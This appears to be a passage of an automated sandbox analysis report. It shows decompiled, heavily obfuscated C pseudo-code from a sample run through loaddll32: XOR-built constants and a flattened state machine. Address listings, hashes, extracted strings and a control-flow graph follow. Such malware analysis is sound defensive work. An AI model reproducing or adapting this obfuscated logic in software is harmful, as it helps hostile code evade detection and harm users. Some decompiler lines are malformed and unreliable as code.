                                                                                                                                                                            				_v352 = _v352 ^ 0xe4c0c54b;
                                                                                                                                                                            				_v340 = 0x7e756a;
                                                                                                                                                                            				_v340 = _v340 << 0xb;
                                                                                                                                                                            				_v340 = _v340 ^ 0xf3ae0159;
                                                                                                                                                                            				_v384 = 0x3029be;
                                                                                                                                                                            				_v384 = _v384 + 0x835e;
                                                                                                                                                                            				_v384 = _v384 ^ 0x9e5eea44;
                                                                                                                                                                            				_v384 = _v384 ^ 0x9e65521f;
                                                                                                                                                                            				_v364 = 0xcf8251;
                                                                                                                                                                            				_v364 = _v364 + 0xffff400c;
                                                                                                                                                                            				_t393 = 0x78;
                                                                                                                                                                            				_v364 = _v364 * 0x5a;
                                                                                                                                                                            				_v364 = _v364 ^ 0x48b0c21e;
                                                                                                                                                                            				_v320 = 0x2b8f03;
                                                                                                                                                                            				_v320 = _v320 << 7;
                                                                                                                                                                            				_v320 = _v320 ^ 0x15cafa02;
                                                                                                                                                                            				_v372 = 0xb0a86a;
                                                                                                                                                                            				_v372 = _v372 ^ 0x35b8bfe6;
                                                                                                                                                                            				_v372 = _v372 ^ 0xed8d6bf1;
                                                                                                                                                                            				_v372 = _v372 ^ 0xd88344ec;
                                                                                                                                                                            				_v344 = 0x8c38;
                                                                                                                                                                            				_v344 = _v344 ^ 0x1ac013b0;
                                                                                                                                                                            				_v344 = _v344 ^ 0x1ac5368a;
                                                                                                                                                                            				_v348 = 0x2c1ac3;
                                                                                                                                                                            				_v348 = _v348 >> 6;
                                                                                                                                                                            				_v348 = _v348 ^ 0x0005c30d;
                                                                                                                                                                            				_v300 = 0x3ae4ba;
                                                                                                                                                                            				_v300 = _v300 >> 0xe;
                                                                                                                                                                            				_v300 = _v300 ^ 0x00012364;
                                                                                                                                                                            				_v396 = 0xe1901;
                                                                                                                                                                            				_v396 = _v396 << 0xe;
                                                                                                                                                                            				_v396 = _v396 + 0x39a8;
                                                                                                                                                                            				_v396 = _v396 ^ 0x864e7189;
                                                                                                                                                                            				_v368 = 0xe5c11e;
                                                                                                                                                                            				_t394 = _v288;
                                                                                                                                                                            				_v368 = _v368 / _t393;
                                                                                                                                                                            				_v368 = _v368 | 0x7320cec6;
                                                                                                                                                                            				_v368 = _v368 ^ 0x73273aba;
                                                                                                                                                                            				_v336 = 0xf33546;
                                                                                                                                                                            				_v336 = _v336 ^ 0x37961faf;
                                                                                                                                                                            				_v336 = _v336 ^ 0x37663e0b;
                                                                                                                                                                            				_v328 = 0x922129;
                                                                                                                                                                            				_v328 = _v328 | 0xf90cd049;
                                                                                                                                                                            				_v328 = _v328 ^ 0xf99851f2;
                                                                                                                                                                            				_v416 = 0x9fd52c;
                                                                                                                                                                            				_v416 = _v416 << 2;
                                                                                                                                                                            				_v416 = _v416 * 0x22;
                                                                                                                                                                            				_v416 = _v416 + 0xffff9e7e;
                                                                                                                                                                            				_v416 = _v416 ^ 0x54e779e0;
                                                                                                                                                                            				_v380 = 0x615361;
                                                                                                                                                                            				_v380 = _v380 >> 1;
                                                                                                                                                                            				_v380 = _v380 + 0x673e;
                                                                                                                                                                            				_v380 = _v380 ^ 0x003e049c;
                                                                                                                                                                            				_v308 = 0x9da5c1;
                                                                                                                                                                            				_v308 = _v308 + 0xf72;
                                                                                                                                                                            				_v308 = _v308 ^ 0x009db133;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t309 = 0xe35a561;
                                                                                                                                                                            					do {
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L2:
                                                                                                                                                                            							_t399 = _t349 - 0x8816d6a;
                                                                                                                                                                            							if(_t399 > 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t399 == 0) {
                                                                                                                                                                            								_t325 =  *0x2f76228; // 0x0
                                                                                                                                                                            								_t328 =  *0x2f76228; // 0x0
                                                                                                                                                                            								_t332 =  *0x2f76228; // 0x0
                                                                                                                                                                            								_t336 = E02F667E6(_t394, _v400, _v360, _v332, _v392,  &_v268,  *( *((intOrPtr*)(_t332 + 4)) + 0x14) & 0x0000ffff, _v292,  &_v276,  *( *((intOrPtr*)(_t328 + 4)) + 0x44) & 0x0000ffff, _v408,  *((intOrPtr*)(_t325 + 4)) + 0x20, _v352,  &_v260);
                                                                                                                                                                            								_t397 = _t397 + 0x30;
                                                                                                                                                                            								if(_t336 == 0) {
                                                                                                                                                                            									L25:
                                                                                                                                                                            									_t349 = 0xc732dcb;
                                                                                                                                                                            									while(1) {
                                                                                                                                                                            										L1:
                                                                                                                                                                            										_t309 = 0xe35a561;
                                                                                                                                                                            										goto L2;
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t349 = 0x772d3d2;
                                                                                                                                                                            									while(1) {
                                                                                                                                                                            										L1:
                                                                                                                                                                            										_t309 = 0xe35a561;
                                                                                                                                                                            										goto L2;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t349 == 0x200f7b2) {
                                                                                                                                                                            									if(_v280 >= _v308) {
                                                                                                                                                                            										_t338 = E02F62E5D( &_v284,  &_v276);
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t338 = E02F580C0( &_v284);
                                                                                                                                                                            									}
                                                                                                                                                                            									_t394 = _t338;
                                                                                                                                                                            									_t309 = 0xe35a561;
                                                                                                                                                                            									_t349 =  !=  ? 0xe35a561 : 0xc732dcb;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t349 == 0x323c58a) {
                                                                                                                                                                            										_t364 =  *0x2f76228; // 0x0
                                                                                                                                                                            										_t340 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)) + 0x18));
                                                                                                                                                                            										 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t364 + 0x1c)) + 1;
                                                                                                                                                                            										_t385 =  *((intOrPtr*)(_t364 + 0x1c));
                                                                                                                                                                            										 *((intOrPtr*)(_t364 + 4)) = _t340;
                                                                                                                                                                            										if(_t340 == 0) {
                                                                                                                                                                            											 *((intOrPtr*)(_t364 + 4)) =  *((intOrPtr*)(_t364 + 0x14));
                                                                                                                                                                            										}
                                                                                                                                                                            										_t341 =  *0x2f76228; // 0x0
                                                                                                                                                                            										if(_t385 >=  *((intOrPtr*)(_t341 + 0x18))) {
                                                                                                                                                                            											_t365 =  *0x2f76228; // 0x0
                                                                                                                                                                            											 *(_t365 + 0x1c) =  *(_t365 + 0x1c) & 0x00000000;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t349 = 0x902256d;
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												L1:
                                                                                                                                                                            												_t309 = 0xe35a561;
                                                                                                                                                                            												goto L2;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t349 == 0x54cb160) {
                                                                                                                                                                            											_t343 = E02F65779( &_v284, _t395, _v388, _v376, _v288);
                                                                                                                                                                            											_t397 = _t397 + 0xc;
                                                                                                                                                                            											if(_t343 != 0) {
                                                                                                                                                                            												_t349 = 0x200f7b2;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L1:
                                                                                                                                                                            													_t309 = 0xe35a561;
                                                                                                                                                                            													goto L2;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t349 != 0x772d3d2) {
                                                                                                                                                                            												goto L35;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												if(E02F56B7A(_v340, _a16, _v384,  &_v268) == 0) {
                                                                                                                                                                            													_t390 = 0x323c58a;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													_t390 = 0x72c7f38;
                                                                                                                                                                            													_t346 = 1;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t349 = 0x939e27d;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L1:
                                                                                                                                                                            													_t309 = 0xe35a561;
                                                                                                                                                                            													goto L2;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							L38:
                                                                                                                                                                            							return _t346;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t349 == 0x902256d) {
                                                                                                                                                                            							_t394 = 0;
                                                                                                                                                                            							E02F6FE2A(_v312, _v356, 0x100,  &_v260);
                                                                                                                                                                            							_v276 = 0;
                                                                                                                                                                            							_t349 = 0x54cb160;
                                                                                                                                                                            							_v272 = 0;
                                                                                                                                                                            							_v284 = 0;
                                                                                                                                                                            							_v280 = 0;
                                                                                                                                                                            							goto L34;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t349 == 0x939e27d) {
                                                                                                                                                                            								E02F72B09(_v364, _v268, _v320, _v372);
                                                                                                                                                                            								goto L25;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t349 == 0xc732dcb) {
                                                                                                                                                                            									E02F72B09(_v344, _v284, _v348, _v300);
                                                                                                                                                                            									E02F72B09(_v396, _t394, _v368, _v336);
                                                                                                                                                                            									E02F72B09(_v328, _v276, _v416, _v380);
                                                                                                                                                                            									_t397 = _t397 + 0x18;
                                                                                                                                                                            									_t349 = _t390;
                                                                                                                                                                            									L34:
                                                                                                                                                                            									_t309 = 0xe35a561;
                                                                                                                                                                            									goto L35;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t349 != _t309) {
                                                                                                                                                                            										goto L35;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_push(_t349);
                                                                                                                                                                            										_push(_t349);
                                                                                                                                                                            										_t322 = E02F6CCA0(1, 0x40);
                                                                                                                                                                            										_push( &_v260);
                                                                                                                                                                            										_push(_t322);
                                                                                                                                                                            										_push(_v304);
                                                                                                                                                                            										_t382 = 0xb;
                                                                                                                                                                            										E02F5E404(_v316, _t382);
                                                                                                                                                                            										_t397 = _t397 + 0x1c;
                                                                                                                                                                            										_t349 = 0x8816d6a;
                                                                                                                                                                            										goto L1;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L38;
                                                                                                                                                                            						L35:
                                                                                                                                                                            					} while (_t349 != 0x72c7f38);
                                                                                                                                                                            					goto L38;
                                                                                                                                                                            				}
                                                                                                                                                                            			}



































































                                                                                                                                                                            0x02f6d1c6
                                                                                                                                                                            0x02f6d1cd
                                                                                                                                                                            0x02f6d1d1
                                                                                                                                                                            0x02f6d1d8
                                                                                                                                                                            0x02f6d1df
                                                                                                                                                                            0x02f6d1e6
                                                                                                                                                                            0x02f6d1ed
                                                                                                                                                                            0x02f6d1f4
                                                                                                                                                                            0x02f6d1fb
                                                                                                                                                                            0x02f6d1fc
                                                                                                                                                                            0x02f6d1fd
                                                                                                                                                                            0x02f6d202
                                                                                                                                                                            0x02f6d20d
                                                                                                                                                                            0x02f6d210
                                                                                                                                                                            0x02f6d21a
                                                                                                                                                                            0x02f6d222
                                                                                                                                                                            0x02f6d224
                                                                                                                                                                            0x02f6d22c
                                                                                                                                                                            0x02f6d231
                                                                                                                                                                            0x02f6d236
                                                                                                                                                                            0x02f6d23e
                                                                                                                                                                            0x02f6d246
                                                                                                                                                                            0x02f6d24e
                                                                                                                                                                            0x02f6d256
                                                                                                                                                                            0x02f6d25b
                                                                                                                                                                            0x02f6d260
                                                                                                                                                                            0x02f6d268
                                                                                                                                                                            0x02f6d270
                                                                                                                                                                            0x02f6d278
                                                                                                                                                                            0x02f6d280
                                                                                                                                                                            0x02f6d288
                                                                                                                                                                            0x02f6d290
                                                                                                                                                                            0x02f6d298
                                                                                                                                                                            0x02f6d2a0
                                                                                                                                                                            0x02f6d2ae
                                                                                                                                                                            0x02f6d2b1
                                                                                                                                                                            0x02f6d2b5
                                                                                                                                                                            0x02f6d2ba
                                                                                                                                                                            0x02f6d2c2
                                                                                                                                                                            0x02f6d2ca
                                                                                                                                                                            0x02f6d2d5
                                                                                                                                                                            0x02f6d2e0
                                                                                                                                                                            0x02f6d2eb
                                                                                                                                                                            0x02f6d2f3
                                                                                                                                                                            0x02f6d2fb
                                                                                                                                                                            0x02f6d303
                                                                                                                                                                            0x02f6d308
                                                                                                                                                                            0x02f6d310
                                                                                                                                                                            0x02f6d318
                                                                                                                                                                            0x02f6d31d
                                                                                                                                                                            0x02f6d325
                                                                                                                                                                            0x02f6d330
                                                                                                                                                                            0x02f6d33b
                                                                                                                                                                            0x02f6d346
                                                                                                                                                                            0x02f6d353
                                                                                                                                                                            0x02f6d357
                                                                                                                                                                            0x02f6d35c
                                                                                                                                                                            0x02f6d361
                                                                                                                                                                            0x02f6d369
                                                                                                                                                                            0x02f6d371
                                                                                                                                                                            0x02f6d376
                                                                                                                                                                            0x02f6d37b
                                                                                                                                                                            0x02f6d383
                                                                                                                                                                            0x02f6d38b
                                                                                                                                                                            0x02f6d390
                                                                                                                                                                            0x02f6d398
                                                                                                                                                                            0x02f6d3a0
                                                                                                                                                                            0x02f6d3a5
                                                                                                                                                                            0x02f6d3ad
                                                                                                                                                                            0x02f6d3b5
                                                                                                                                                                            0x02f6d3bd
                                                                                                                                                                            0x02f6d3c8
                                                                                                                                                                            0x02f6d3d5
                                                                                                                                                                            0x02f6d3e0
                                                                                                                                                                            0x02f6d3e8
                                                                                                                                                                            0x02f6d3f6
                                                                                                                                                                            0x02f6d3fb
                                                                                                                                                                            0x02f6d401
                                                                                                                                                                            0x02f6d409
                                                                                                                                                                            0x02f6d411
                                                                                                                                                                            0x02f6d419
                                                                                                                                                                            0x02f6d421
                                                                                                                                                                            0x02f6d429
                                                                                                                                                                            0x02f6d431
                                                                                                                                                                            0x02f6d436
                                                                                                                                                                            0x02f6d43e
                                                                                                                                                                            0x02f6d446
                                                                                                                                                                            0x02f6d44e
                                                                                                                                                                            0x02f6d456
                                                                                                                                                                            0x02f6d45e
                                                                                                                                                                            0x02f6d466
                                                                                                                                                                            0x02f6d473
                                                                                                                                                                            0x02f6d47b
                                                                                                                                                                            0x02f6d47f
                                                                                                                                                                            0x02f6d487
                                                                                                                                                                            0x02f6d48f
                                                                                                                                                                            0x02f6d494
                                                                                                                                                                            0x02f6d49c
                                                                                                                                                                            0x02f6d4a4
                                                                                                                                                                            0x02f6d4ac
                                                                                                                                                                            0x02f6d4b4
                                                                                                                                                                            0x02f6d4bc
                                                                                                                                                                            0x02f6d4c4
                                                                                                                                                                            0x02f6d4cc
                                                                                                                                                                            0x02f6d4d4
                                                                                                                                                                            0x02f6d4dc
                                                                                                                                                                            0x02f6d4e1
                                                                                                                                                                            0x02f6d4e9
                                                                                                                                                                            0x02f6d4f4
                                                                                                                                                                            0x02f6d4fc
                                                                                                                                                                            0x02f6d507
                                                                                                                                                                            0x02f6d50f
                                                                                                                                                                            0x02f6d51c
                                                                                                                                                                            0x02f6d524
                                                                                                                                                                            0x02f6d52c
                                                                                                                                                                            0x02f6d53a
                                                                                                                                                                            0x02f6d541
                                                                                                                                                                            0x02f6d545
                                                                                                                                                                            0x02f6d54d
                                                                                                                                                                            0x02f6d555
                                                                                                                                                                            0x02f6d55d
                                                                                                                                                                            0x02f6d565
                                                                                                                                                                            0x02f6d56d
                                                                                                                                                                            0x02f6d575
                                                                                                                                                                            0x02f6d57d
                                                                                                                                                                            0x02f6d585
                                                                                                                                                                            0x02f6d58d
                                                                                                                                                                            0x02f6d597
                                                                                                                                                                            0x02f6d59b
                                                                                                                                                                            0x02f6d5a3
                                                                                                                                                                            0x02f6d5ab
                                                                                                                                                                            0x02f6d5b3
                                                                                                                                                                            0x02f6d5b7
                                                                                                                                                                            0x02f6d5bf
                                                                                                                                                                            0x02f6d5c7
                                                                                                                                                                            0x02f6d5d2
                                                                                                                                                                            0x02f6d5dd
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5ed
                                                                                                                                                                            0x02f6d5ed
                                                                                                                                                                            0x02f6d5ed
                                                                                                                                                                            0x02f6d5ed
                                                                                                                                                                            0x02f6d5f3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d5f9
                                                                                                                                                                            0x02f6d716
                                                                                                                                                                            0x02f6d726
                                                                                                                                                                            0x02f6d742
                                                                                                                                                                            0x02f6d76a
                                                                                                                                                                            0x02f6d76f
                                                                                                                                                                            0x02f6d774
                                                                                                                                                                            0x02f6d785
                                                                                                                                                                            0x02f6d785
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d776
                                                                                                                                                                            0x02f6d776
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5ff
                                                                                                                                                                            0x02f6d605
                                                                                                                                                                            0x02f6d6dd
                                                                                                                                                                            0x02f6d6ed
                                                                                                                                                                            0x02f6d6df
                                                                                                                                                                            0x02f6d6df
                                                                                                                                                                            0x02f6d6df
                                                                                                                                                                            0x02f6d6f2
                                                                                                                                                                            0x02f6d6fb
                                                                                                                                                                            0x02f6d700
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d60b
                                                                                                                                                                            0x02f6d611
                                                                                                                                                                            0x02f6d691
                                                                                                                                                                            0x02f6d69a
                                                                                                                                                                            0x02f6d69d
                                                                                                                                                                            0x02f6d6a0
                                                                                                                                                                            0x02f6d6a3
                                                                                                                                                                            0x02f6d6a8
                                                                                                                                                                            0x02f6d6ad
                                                                                                                                                                            0x02f6d6ad
                                                                                                                                                                            0x02f6d6b0
                                                                                                                                                                            0x02f6d6b8
                                                                                                                                                                            0x02f6d8c4
                                                                                                                                                                            0x02f6d8ca
                                                                                                                                                                            0x02f6d6be
                                                                                                                                                                            0x02f6d6be
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d613
                                                                                                                                                                            0x02f6d619
                                                                                                                                                                            0x02f6d677
                                                                                                                                                                            0x02f6d67c
                                                                                                                                                                            0x02f6d681
                                                                                                                                                                            0x02f6d687
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d61b
                                                                                                                                                                            0x02f6d621
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d627
                                                                                                                                                                            0x02f6d647
                                                                                                                                                                            0x02f6d653
                                                                                                                                                                            0x02f6d649
                                                                                                                                                                            0x02f6d64b
                                                                                                                                                                            0x02f6d650
                                                                                                                                                                            0x02f6d650
                                                                                                                                                                            0x02f6d658
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d5e8
                                                                                                                                                                            0x02f6d621
                                                                                                                                                                            0x02f6d619
                                                                                                                                                                            0x02f6d611
                                                                                                                                                                            0x02f6d605
                                                                                                                                                                            0x02f6d8d1
                                                                                                                                                                            0x02f6d8da
                                                                                                                                                                            0x02f6d8da
                                                                                                                                                                            0x02f6d795
                                                                                                                                                                            0x02f6d87f
                                                                                                                                                                            0x02f6d887
                                                                                                                                                                            0x02f6d890
                                                                                                                                                                            0x02f6d897
                                                                                                                                                                            0x02f6d89c
                                                                                                                                                                            0x02f6d8a3
                                                                                                                                                                            0x02f6d8aa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d79b
                                                                                                                                                                            0x02f6d7a1
                                                                                                                                                                            0x02f6d864
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d7a7
                                                                                                                                                                            0x02f6d7ad
                                                                                                                                                                            0x02f6d817
                                                                                                                                                                            0x02f6d82a
                                                                                                                                                                            0x02f6d845
                                                                                                                                                                            0x02f6d84a
                                                                                                                                                                            0x02f6d84d
                                                                                                                                                                            0x02f6d8b1
                                                                                                                                                                            0x02f6d8b1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d7af
                                                                                                                                                                            0x02f6d7b1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d7b7
                                                                                                                                                                            0x02f6d7ca
                                                                                                                                                                            0x02f6d7cb
                                                                                                                                                                            0x02f6d7d0
                                                                                                                                                                            0x02f6d7dc
                                                                                                                                                                            0x02f6d7dd
                                                                                                                                                                            0x02f6d7de
                                                                                                                                                                            0x02f6d7ee
                                                                                                                                                                            0x02f6d7ef
                                                                                                                                                                            0x02f6d7f4
                                                                                                                                                                            0x02f6d7f7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d7f7
                                                                                                                                                                            0x02f6d7b1
                                                                                                                                                                            0x02f6d7ad
                                                                                                                                                                            0x02f6d7a1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d8b6
                                                                                                                                                                            0x02f6d8b6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6d8c2

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: -c$0^$8M$>g$aSa$ju~$}9$}9$<9$C:$yT$yT
                                                                                                                                                                            • API String ID: 0-111235429
                                                                                                                                                                            • Opcode ID: d63a0dbb06b12fda306d4ad0d29fdf88460cfec90fb7c495b41cd43d0f1816b4
                                                                                                                                                                            • Instruction ID: 30b7c0715ed94a30a9c1da9e7c3710094ac3120fd63ec034421cb31062dd461f
                                                                                                                                                                            • Opcode Fuzzy Hash: d63a0dbb06b12fda306d4ad0d29fdf88460cfec90fb7c495b41cd43d0f1816b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 070232716083809FD368CF25C589A6BBBF1FBC4788F50891DE69A86260C7B1C949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 724 2f557b8-2f56307 call 2f6fe29 727 2f56312 724->727 728 2f56317 727->728 729 2f5631c-2f56322 728->729 730 2f56578-2f5657e 729->730 731 2f56328 729->731 732 2f56584-2f5658a 730->732 733 2f5668f-2f566b7 call 2f712c1 730->733 734 2f5648f-2f56569 call 2f6e1f8 * 2 call 2f5738a call 2f6fecb * 2 731->734 735 2f5632e-2f56330 731->735 737 2f56641-2f5668a call 2f5c5d8 732->737 738 2f56590-2f56596 732->738 751 2f566bc-2f566cb 733->751 784 2f5656e-2f56573 734->784 739 2f56336-2f56338 735->739 740 2f5641d-2f5648a call 2f51bc9 735->740 737->729 745 2f56637-2f5663c 738->745 746 2f5659c-2f565a2 738->746 747 2f566de-2f566fd call 2f5f7fe 739->747 748 2f5633e-2f56340 739->748 740->728 745->729 753 2f566d0-2f566d6 746->753 754 2f565a8-2f56632 call 2f6e1f8 call 2f5f288 call 2f6fecb 746->754 768 2f566fe-2f5670a 747->768 755 2f56346-2f5634c 748->755 756 2f563d0-2f5641b call 2f522c9 748->756 751->753 753->729 760 2f566dc 753->760 754->784 762 2f563ac-2f563ce call 2f72b09 755->762 763 2f5634e-2f56350 755->763 773 2f563a3-2f563a7 756->773 760->768 762->773 763->753 770 2f56356-2f563a0 call 2f6cbe9 763->770 770->773 773->727 784->751
                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F557B8(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				void _v12;
                                                                                                                                                                            				void _v16;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				char _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				unsigned int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				signed int _v212;
                                                                                                                                                                            				signed int _v216;
                                                                                                                                                                            				signed int _v220;
                                                                                                                                                                            				intOrPtr _v224;
                                                                                                                                                                            				signed int _v228;
                                                                                                                                                                            				signed int _v232;
                                                                                                                                                                            				signed int _v236;
                                                                                                                                                                            				signed int _v240;
                                                                                                                                                                            				signed int _v244;
                                                                                                                                                                            				signed int _v248;
                                                                                                                                                                            				signed int _v252;
                                                                                                                                                                            				signed int _v256;
                                                                                                                                                                            				signed int _v260;
                                                                                                                                                                            				signed int _v264;
                                                                                                                                                                            				signed int _v268;
                                                                                                                                                                            				signed int _v272;
                                                                                                                                                                            				signed int _v276;
                                                                                                                                                                            				signed int _v280;
                                                                                                                                                                            				signed int _v284;
                                                                                                                                                                            				signed int _v288;
                                                                                                                                                                            				signed int _v292;
                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                            				signed int _v300;
                                                                                                                                                                            				signed int _v304;
                                                                                                                                                                            				signed int _v308;
                                                                                                                                                                            				signed int _v312;
                                                                                                                                                                            				signed int _v316;
                                                                                                                                                                            				signed int _v320;
                                                                                                                                                                            				void* _t657;
                                                                                                                                                                            				intOrPtr _t715;
                                                                                                                                                                            				void* _t716;
                                                                                                                                                                            				void* _t717;
                                                                                                                                                                            				void* _t725;
                                                                                                                                                                            				void* _t729;
                                                                                                                                                                            				void* _t737;
                                                                                                                                                                            				void* _t740;
                                                                                                                                                                            				intOrPtr _t746;
                                                                                                                                                                            				void* _t798;
                                                                                                                                                                            				void* _t814;
                                                                                                                                                                            				signed int _t816;
                                                                                                                                                                            				signed int _t817;
                                                                                                                                                                            				signed int _t818;
                                                                                                                                                                            				signed int _t819;
                                                                                                                                                                            				signed int _t820;
                                                                                                                                                                            				signed int _t821;
                                                                                                                                                                            				signed int _t822;
                                                                                                                                                                            				signed int _t823;
                                                                                                                                                                            				signed int _t824;
                                                                                                                                                                            				signed int _t825;
                                                                                                                                                                            				signed int _t826;
                                                                                                                                                                            				signed int _t827;
                                                                                                                                                                            				signed int _t828;
                                                                                                                                                                            				void* _t829;
                                                                                                                                                                            				void* _t832;
                                                                                                                                                                            				void* _t833;
                                                                                                                                                                            				void* _t834;
                                                                                                                                                                            				void* _t840;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_t746 = __edx;
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_v224 = __edx;
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(0x20);
                                                                                                                                                                            				E02F6FE29(_t657);
                                                                                                                                                                            				_v108 = 0x7f0a1;
                                                                                                                                                                            				_t834 = _t833 + 0x20;
